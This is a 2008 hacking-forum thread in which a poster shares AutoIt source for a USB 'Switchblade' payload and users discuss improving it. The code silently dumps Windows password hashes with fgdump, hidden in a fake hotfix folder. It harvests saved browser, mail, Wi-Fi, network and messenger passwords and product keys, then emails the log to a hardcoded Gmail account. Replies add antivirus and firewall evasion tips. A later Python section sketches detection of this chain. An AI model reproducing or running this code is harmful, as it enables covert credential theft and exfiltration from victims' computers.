X3N Posted October 28, 2008

Dun dun dun... OK, I finally decided to release my code. Hopefully there will be some suggestions on how to make it better. I have a main payload and an SMTP mailer payload; they both work great. I am also working on creating a multi-OS development environment with a GUI so anybody can throw together their own payload fast. I dislike the U3 customizer because it pretty much sucks. Currently there are two possible methods to use the LP installer. One is to change your hosts file or DNS entry and the other is to modify the exe to point to localhost or your own custom server name.

The launcher script, which launches both the payload and the PStart menu:

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
    Switchblade starter

#ce ----------------------------------------------------------------------------

#include <Date.au3>

$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
    ;MsgBox(4096, "", "Found " & $usb[0] & " drives")
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf

Run ( $usbdr & "pstart" )
Run ( "SYSTEM\SRC\go.exe" , "SYSTEM\SRC\" )

Main go.exe code:

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
    REdo of switchblade

#ce ----------------------------------------------------------------------------

#include <Date.au3>
#NoTrayIcon

; Find USB drive letter & set as variable
$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf

$time = @HOUR & "-" & @MIN & "-" & @SEC
EnvUpdate()
$computername = EnvGet("computername")
$systemroot = EnvGet("systemroot")
$logdir = $usbdr & "\System\Logs\" & $computername

;log file
$log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log"

;templogfiles
$tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log"
$tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log"
$tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log"
$tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log"
$tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log"
$tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log"
$tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log"
$tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log"
$tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log"
$tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log"

;Run Pstart menu
Run( $usbdr & "pstart" )
DirCreate( $logdir )
;Run( "csrsss.exe" )

;Remove previous run of fgdump if it exists
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)

;Open log file for editing... and adding logs...
$file = FileOpen($log, 1)

;create and run fgdump on local system
DirCreate( $systemroot & "\$NtUninstallKB531336$" )
FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" )
RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE )

;General Information on computer using autoIT macros
FileWriteLine($file, "----------------------X3n's Payload Time Started: " & _Now() & @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "IP add 1: " & @ipaddress1)
FileWriteLine($file, "IP add 2: " &@ipaddress2)
FileWriteLine($file, "IP add 3: " &@ipaddress3)
FileWriteLine($file, "IP add 4: " &@ipaddress4)
FileWriteLine($file, "DNS Domain: " &@LogonDNSDomain)
FileWriteLine($file, "Logon Domain: " &@LogonDomain)
FileWriteLine($file, "Logon Server: " &@LogonServer)
FileWriteLine($file, "Operating System: " &@OSVersion)
FileWriteLine($file, "Username: " &@UserName)

;Get pwdump log file
FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF)
$v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump")
FileWrite($file, $v_pwdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now() & @CRLF)

;Get cachedump log file
FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF)
$v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump")
FileWrite($file, $v_cdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now() & @CRLF)

;password fox
FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE)
$v_tmplog1 = FileRead($tmplog1)
FileWrite($file, $v_tmplog1)
ProcessWaitClose("PasswordFox.exe")
FileWriteLine($file, _Now() & @CRLF)

; Dump mozilla history
FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE)
$v_tmplog2 = FileRead($tmplog2)
FileWrite($file, $v_tmplog2)
FileWriteLine($file, @CRLF)
ProcessWaitClose("MHV.exe")

;Dump ie saved passwords
FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE)
$v_tmplog3 = FileRead($tmplog3)
FileWrite($file, $v_tmplog3)
FileWriteLine($file, @CRLF)
ProcessWaitClose("iepv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump mail passwords
FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE)
$v_tmplog4 = FileRead($tmplog4)
FileWrite($file, $v_tmplog4)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mpv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Product Keys
FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE)
$v_tmplog5 = FileRead($tmplog5)
FileWrite($file, $v_tmplog5)
FileWriteLine($file, @CRLF)
ProcessWaitClose("prok.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump protected storage
FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE)
$v_tmplog6 = FileRead($tmplog6)
FileWrite($file, $v_tmplog6)
FileWriteLine($file, @CRLF)
ProcessWaitClose("pspv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump WIFI saved Keys
FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE)
$v_tmplog7 = FileRead($tmplog7)
FileWrite($file, $v_tmplog7)
FileWriteLine($file, @CRLF)
ProcessWaitClose("wkv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Network passwords
FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE)
$v_tmplog8 = FileRead($tmplog8)
FileWrite($file, $v_tmplog8)
FileWriteLine($file, @CRLF)
ProcessWaitClose("netpass.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Messenger passwords
FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE)
$v_tmplog9 = FileRead($tmplog9)
FileWrite($file, $v_tmplog9)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mspass.exe")
FileWriteLine($file, _Now() & @CRLF)

FileWriteLine($file, "-------------------------X3n's Payload Time Ended: " & _Now() & @CRLF)
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
FileClose($file)
FileDelete($tmplog1)
FileDelete($tmplog2)
FileDelete($tmplog3)
FileDelete($tmplog4)
FileDelete($tmplog5)
FileDelete($tmplog6)
FileDelete($tmplog7)
FileDelete($tmplog8)
FileDelete($tmplog9)
FileDelete($tmplog10)

SMTP mailer (go-smtp.exe):

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
    REdo of switchblade

#ce ----------------------------------------------------------------------------

#include <Date.au3>
#NoTrayIcon

; Find USB drive letter & set as variable
$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf

$time = @HOUR & "-" & @MIN & "-" & @SEC
EnvUpdate()
$computername = EnvGet("computername")
$systemroot = EnvGet("systemroot")
$logdir = $usbdr & "\System\Logs\" & $computername

;log files
$log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log"

;templogfiles
$tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log"
$tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log"
$tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log"
$tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log"
$tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log"
$tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log"
$tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log"
$tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log"
$tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log"
$tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log"

;email to gmail account settings
$emailfrom = ("hckbld")
$emailto = ("hckbld@gmail.com")
$epassword = ("hckbld#2008")
$subject = $computername & $time

;Run Pstart menu
Run( $usbdr & "pstart" )
DirCreate( $logdir )
;Run( "csrsss.exe" )

;Remove previous run of fgdump if it exists
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)

;Open log file for editing... and adding logs...
$file = FileOpen($log, 1)

;create and run fgdump on local system
DirCreate( $systemroot & "\$NtUninstallKB531336$" )
FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" )
RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE )

;General Information on computer using autoIT macros
FileWriteLine($file, "----------------------X3n's Payload Time Started: " & _Now() & @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "IP add 1: " & @ipaddress1)
FileWriteLine($file, "IP add 2: " &@ipaddress2)
FileWriteLine($file, "IP add 3: " &@ipaddress3)
FileWriteLine($file, "IP add 4: " &@ipaddress4)
FileWriteLine($file, "DNS Domain: " &@LogonDNSDomain)
FileWriteLine($file, "Logon Domain: " &@LogonDomain)
FileWriteLine($file, "Logon Server: " &@LogonServer)
FileWriteLine($file, "Operating System: " &@OSVersion)
FileWriteLine($file, "Username: " &@UserName)

;Get pwdump log file
FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF)
$v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump")
FileWrite($file, $v_pwdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now() & @CRLF)

;Get cachedump log file
FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF)
$v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump")
FileWrite($file, $v_cdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now() & @CRLF)

;password fox
FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE)
$v_tmplog1 = FileRead($tmplog1)
FileWrite($file, $v_tmplog1)
ProcessWaitClose("PasswordFox.exe")
FileWriteLine($file, _Now() & @CRLF)

; Dump mozilla history
FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE)
$v_tmplog2 = FileRead($tmplog2)
FileWrite($file, $v_tmplog2)
FileWriteLine($file, @CRLF)
ProcessWaitClose("MHV.exe")

;Dump ie saved passwords
FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE)
$v_tmplog3 = FileRead($tmplog3)
FileWrite($file, $v_tmplog3)
FileWriteLine($file, @CRLF)
ProcessWaitClose("iepv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump mail passwords
FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE)
$v_tmplog4 = FileRead($tmplog4)
FileWrite($file, $v_tmplog4)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mpv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Product Keys
FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE)
$v_tmplog5 = FileRead($tmplog5)
FileWrite($file, $v_tmplog5)
FileWriteLine($file, @CRLF)
ProcessWaitClose("prok.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump protected storage
FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE)
$v_tmplog6 = FileRead($tmplog6)
FileWrite($file, $v_tmplog6)
FileWriteLine($file, @CRLF)
ProcessWaitClose("pspv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump WIFI saved Keys
FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE)
$v_tmplog7 = FileRead($tmplog7)
FileWrite($file, $v_tmplog7)
FileWriteLine($file, @CRLF)
ProcessWaitClose("wkv.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Network passwords
FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE)
$v_tmplog8 = FileRead($tmplog8)
FileWrite($file, $v_tmplog8)
FileWriteLine($file, @CRLF)
ProcessWaitClose("netpass.exe")
FileWriteLine($file, _Now() & @CRLF)

;Dump Messenger passwords
FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE)
$v_tmplog9 = FileRead($tmplog9)
FileWrite($file, $v_tmplog9)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mspass.exe")
FileWriteLine($file, _Now() & @CRLF)

FileWriteLine($file, "-------------------------X3n's Payload Time Ended: " & _Now() & @CRLF)
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
FileClose($file)
FileDelete($tmplog1)
FileDelete($tmplog2)
FileDelete($tmplog3)
FileDelete($tmplog4)
FileDelete($tmplog5)
FileDelete($tmplog6)
FileDelete($tmplog7)
FileDelete($tmplog8)
FileDelete($tmplog9)
FileDelete($tmplog10)

#Include <file.au3>
Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")

;##################################
; Include
;##################################
#Include <file.au3>

;##################################
; Variables
;##################################
$s_SmtpServer = "smtp.gmail.com"   ; address for the smtp-server to use - REQUIRED
$s_FromName = "xxx"                ; name from who the email was sent
$s_FromAddress = "xxx@gmail.com"   ; address from where the mail should come
$s_ToAddress = "xxx@gmail.com"     ; destination address of the email - REQUIRED
$s_Subject = $log                  ; subject from the email - can be anything you want it to be
$as_Body = ""                      ; the messagebody from the mail - can be left blank but then you get a blank mail
$s_AttachFiles = $log              ; the file you want to attach - leave blank if not needed
$s_CcAddress = ""                  ; address for cc - leave blank if not needed
$s_BccAddress = ""                 ; address for bcc - leave blank if not needed
$s_Username = "xxxxx"              ; username for the account used from where the mail gets sent - Optional (Needed for eg GMail)
$s_Password = "xxxxx"              ; password for the account used from where the mail gets sent - Optional (Needed for eg GMail)
$IPPort = 465                      ; port used for sending the mail
$ssl = 1                           ; enables/disables secure socket layer sending - put to 1 if using httpS
;~ $IPPort=465                     ; GMAIL port used for sending the mail
;~ $ssl=1                          ; GMAIL enables/disables secure socket layer sending - put to 1 if using httpS

;##################################
; Script
;##################################
Global $oMyRet[2]
Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
$rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $s_AttachFiles, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
If @error Then
    MsgBox(0, "Error sending message", "Error code:" & @error & " Rc:" & $rc)
EndIf

;
Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Username = "", $s_Password = "", $IPPort = 25, $ssl = 0)
    $objEmail = ObjCreate("CDO.Message")
    $objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>'
    $objEmail.To = $s_ToAddress
    Local $i_Error = 0
    Local $i_Error_desciption = ""
    If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress
    If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress
    $objEmail.Subject = $s_Subject
    If StringInStr($as_Body, "<") And StringInStr($as_Body, ">") Then
        $objEmail.HTMLBody = $as_Body
    Else
        $objEmail.Textbody = $as_Body & @CRLF
    EndIf
    If $s_AttachFiles <> "" Then
        Local $S_Files2Attach = StringSplit($s_AttachFiles, ";")
        For $x = 1 To $S_Files2Attach[0]
            $S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x])
            If FileExists($S_Files2Attach[$x]) Then
                $objEmail.AddAttachment($S_Files2Attach[$x])
            Else
                $i_Error_desciption = $i_Error_desciption & @LF & 'File not found to attach: ' & $S_Files2Attach[$x]
                SetError(1)
                Return 0
            EndIf
        Next
    EndIf
    $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer
    $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort
    ;Authenticated SMTP
    If $s_Username <> "" Then
        $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
        $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username
        $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password
    EndIf
    If $ssl Then
        $objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
    EndIf
    ;Update settings
    $objEmail.Configuration.Fields.Update
    ; Send the Message
    $objEmail.Send
    If @error Then
        SetError(2)
        Return $oMyRet[1]
    EndIf
EndFunc   ;==>_INetSmtpMailCom

;
;
; Com Error Handler
Func MyErrFunc()
    $HexNumber = Hex($oMyError.number, 8)
    $oMyRet[0] = $HexNumber
    $oMyRet[1] = StringStripWS($oMyError.description, 3)
    ConsoleWrite("### COM Error ! Number: " & $HexNumber & " ScriptLine: " & $oMyError.scriptline & " Description:" & $oMyRet[1] & @LF)
    SetError(1) ; something to check for when this function returns
    Return
EndFunc   ;==>MyErrFunc
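The detection-side counterpart to the payload above, added here as an example and not part of X3N's post: it scans process-creation records (Sysmon Event ID 1 style, reduced to a constructed one-line key=value form) for the artifacts go.exe leaves behind, namely the NirSoft tools run with /stext, fgdump staged in a made-up $NtUninstallKB...$ folder under the system root, and a burst of such launches under one parent process. The record format, field names and sample rows are assumptions made for this example.

```python
"""Detection sketch for the credential-dump chain in the posted payload.

Added example, not part of the original post. Scans process-creation
records (Sysmon Event ID 1 reduced to a constructed 'key=value|...'
text form) for behaviours go.exe exhibits: NirSoft recovery tools run
with /stext, fgdump staged in a fake $NtUninstallKB...$ folder under
the system root, and a burst of such launches under one parent process.
The record format, field names and sample rows are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Executable names taken from the payload posted above (lower case).
CRED_TOOLS = {
    "fgdump.exe", "passwordfox.exe", "mhv.exe", "iepv.exe", "mpv.exe",
    "prok.exe", "pspv.exe", "wkv.exe", "netpass.exe", "mspass.exe",
}
# Genuine hotfix uninstall folders look like C:\WINDOWS\$NtUninstallKB123456$
# and hold spuninst.exe; the payload creates one with an invented KB number
# to hide fgdump in, so any other executable started from such a folder
# is worth a look.
KB_DIR = re.compile(r"\\\$ntuninstallkb\d+\$\\", re.IGNORECASE)
STEXT = re.compile(r"(^|\s)/stext(\s|$)", re.IGNORECASE)


def parse_event(line):
    """Parse one constructed 'k=v|k=v|...' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return {
        "time": datetime.strptime(fields["time"], "%Y-%m-%d %H:%M:%S"),
        "image": fields["image"],
        "cmdline": fields.get("cmdline", ""),
        "parent": fields.get("parent", ""),
    }


def classify(ev):
    """Return the reasons one event looks like part of the chain."""
    reasons = []
    path = ev["image"]
    name = path.rsplit("\\", 1)[-1].lower()
    if name in CRED_TOOLS:
        reasons.append("known credential-dump tool: " + name)
    if STEXT.search(ev["cmdline"]):
        reasons.append("NirSoft-style /stext dump to file")
    if KB_DIR.search(path) and name != "spuninst.exe":
        reasons.append("executable launched from $NtUninstallKB...$ folder")
    return reasons


def detect(lines, window=timedelta(minutes=5), burst=3):
    """Return (findings, bursty_parents).

    findings: [(image, [reason, ...]), ...] for every suspicious event.
    bursty_parents: parent PIDs that spawned at least `burst` suspicious
    children inside `window`, which is the back-to-back tool launching
    the payload performs.
    """
    findings, by_parent = [], defaultdict(list)
    for ev in (parse_event(l) for l in lines):
        reasons = classify(ev)
        if reasons:
            findings.append((ev["image"], reasons))
            by_parent[ev["parent"]].append(ev["time"])
    bursty = []
    for parent, times in by_parent.items():
        times.sort()
        for i, start in enumerate(times):
            # count suspicious launches in [start, start + window]
            inside = sum(1 for t in times[i:] if t - start <= window)
            if inside >= burst:
                bursty.append(parent)
                break
    return findings, bursty


# Constructed sample records: one fake-KB fgdump launch, two NirSoft
# dumps from the same parent, a benign notepad, and a genuine hotfix
# uninstaller that must not fire.
SAMPLE_EVENTS = [
    "time=2008-10-28 09:12:01|parent=1790|image=C:\\WINDOWS\\$NtUninstallKB531336$\\fgdump.exe|cmdline=fgdump.exe",
    "time=2008-10-28 09:12:40|parent=1790|image=E:\\SYSTEM\\SRC\\PasswordFox.exe|cmdline=PasswordFox.exe /stext E:\\System\\Logs\\LAB-PC_temp01.log",
    "time=2008-10-28 09:12:55|parent=1790|image=E:\\SYSTEM\\SRC\\iepv.exe|cmdline=iepv.exe /stext E:\\System\\Logs\\LAB-PC_temp03.log",
    "time=2008-10-28 09:13:10|parent=1790|image=C:\\WINDOWS\\system32\\notepad.exe|cmdline=notepad.exe C:\\notes.txt",
    "time=2008-10-28 10:40:00|parent=2100|image=C:\\WINDOWS\\$NtUninstallKB000001$\\spuninst\\spuninst.exe|cmdline=spuninst.exe /quiet",
]

if __name__ == "__main__":
    found, bursty = detect(SAMPLE_EVENTS)
    for image, reasons in found:
        print(image, "->", "; ".join(reasons))
    print("parents with a dump burst:", bursty)
```

The spuninst.exe exemption is the kind of allow-list a real rule needs, since the folder-name pattern alone also matches legitimate hotfix uninstall directories.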
X3N Posted October 28, 2008

I'll be posting my development environment GUI soon, plus the non-U3 versions of this code.
Matessim Posted October 30, 2008

Any chance you can upload?
X3N Posted October 30, 2008

I'm working on finishing my entire development environment and I'll upload a zip of the whole thing when it's finished.
DMilton Posted October 30, 2008

Good work. I will download AutoIT to compile the modules and see how it works... Thanks!
X3N Posted October 30, 2008

> Good work. I will download AutoIT to compile the modules and see how it works... Thanks!

You don't even have to compile it to run it. Just install AutoIT and you can just run the scripts. Also, it's meant to be run with the latest NirSoft programs, so if anyone is interested they can just roll their own payload.
Matessim Posted October 31, 2008

OK, good.
X3N Posted December 22, 2008

Posting the U3 dev environment, ver .01b: http://dl.getdropbox.com/u/332413/u3dev/u3dev.7z
DMilton Posted December 22, 2008

I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3? Is the original hosts file copied and reinstalled after the ISO is updated?

Edit: answered.

FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
..
..
If FileExists( @SystemDir & "\drivers\etc\hosts.orig") Then FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

WOW!
kickarse Posted December 22, 2008

I would have FileInstall install the files with different names; that way it can fool some of the virus scanners. Other than that, fairly good. You could also adapt this script I wrote to capture what's installed:

Dim $strComputer, $objWMIService
Const $wbemFlagReturnImmediately = 0x10
Const $wbemFlagForwardOnly = 0x20
$strComputer = "."
$objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2")
_Read_Products()
Exit

Func _Read_Products()
    Local $colItems = ""
    $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")
    For $objItem In $colItems
        ;$ProductName = $objItem.Name
        Select
            Case StringInStr($objItem.Name, 'Microsoft .NET Framework') ;and StringLeft($objItem.Version,'3')="3.5"
                MsgBox(0, "Found", $objItem.Name & @CRLF & $objItem.Version)
                ;Return 1
        EndSelect
    Next
EndFunc

How come you use EnvGet and don't use @ComputerName or @SystemDir? _FileWriteLog will give you the time and date on each line.
X3N Posted December 22, 2008

> I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3? Is the original hosts file copied and reinstalled after the ISO is updated?
>
> Edit: answered.
>
> FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
> ..
> ..
> If FileExists( @SystemDir & "\drivers\etc\hosts.orig") Then FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )
>
> WOW!

Yeah, that's what I made it do.
X3N Posted December 22, 2008

I'm also working on an incident response package in AutoIT.
DMilton Posted December 22, 2008

What about the GUI?
X3N Posted December 22, 2008

> What about the GUI?

I didn't clean up the files well enough; some of those files I was using for development. wstart has everything in it; some of the others are just extra. I was using KODa to generate the GUI layout.
DMilton Posted December 22, 2008

Ok, ok, ok... I'm seeing it now... I know that having your compiled version of the payload is better for hiding your fingerprints, because you are compiling the mail account name and password into the same exe file, but what about doing it the MySQL+PHP way that was written up in this same forum? By the way, it assures a bypass of any router because it does the stuff over port 80.
sc0rpi0 Posted December 23, 2008

> Ok, ok, ok... I'm seeing it now... I know that having your compiled version of the payload is better for hiding your fingerprints, because you are compiling the mail account name and password into the same exe file, but what about doing it the MySQL+PHP way that was written up in this same forum? By the way, it assures a bypass of any router because it does the stuff over port 80.

How about doing the PHP log transfer thing with AutoIt? When most programs are run, whether using PHP or SMTP, they always trigger a question from decent firewalls: DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET? I think I have found a way to bypass this completely. AutoIt has a way of accessing web pages in the background with IE... which is typically already allowed internet access. Using this method and PHP, logs can be transferred without any kind of interruption. I have most of the stuff already coded in AutoIt; I am currently working out the bugs.
X3N Posted December 23, 2008

> How about doing the PHP log transfer thing with AutoIt? When most programs are run, whether using PHP or SMTP, they always trigger a question from decent firewalls: DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET? I think I have found a way to bypass this completely. AutoIt has a way of accessing web pages in the background with IE... which is typically already allowed internet access. Using this method and PHP, logs can be transferred without any kind of interruption. I have most of the stuff already coded in AutoIt; I am currently working out the bugs.

I'm not overly concerned with the PHP log stuff... I can definitely add the functionality if someone else wants to write it.
X3N Posted December 23, 2008

> I would have FileInstall install the files with different names; that way it can fool some of the virus scanners. Other than that, fairly good. You could also adapt this script I wrote to capture what's installed:
>
> Dim $strComputer, $objWMIService
> Const $wbemFlagReturnImmediately = 0x10
> Const $wbemFlagForwardOnly = 0x20
> $strComputer = "."
> $objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2")
> _Read_Products()
> Exit
>
> Func _Read_Products()
>     Local $colItems = ""
>     $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")
>     For $objItem In $colItems
>         ;$ProductName = $objItem.Name
>         Select
>             Case StringInStr($objItem.Name, 'Microsoft .NET Framework') ;and StringLeft($objItem.Version,'3')="3.5"
>                 MsgBox(0, "Found", $objItem.Name & @CRLF & $objItem.Version)
>                 ;Return 1
>         EndSelect
>     Next
> EndFunc
>
> How come you use EnvGet and don't use @ComputerName or @SystemDir? _FileWriteLog will give you the time and date on each line.

This was my first attempt at writing anything long in AutoIT, so the code is messy... I have a way better method now that I'll be releasing soon that uses FileInstall and runs everything in a much more logical way.
DMilton Posted December 23, 2008

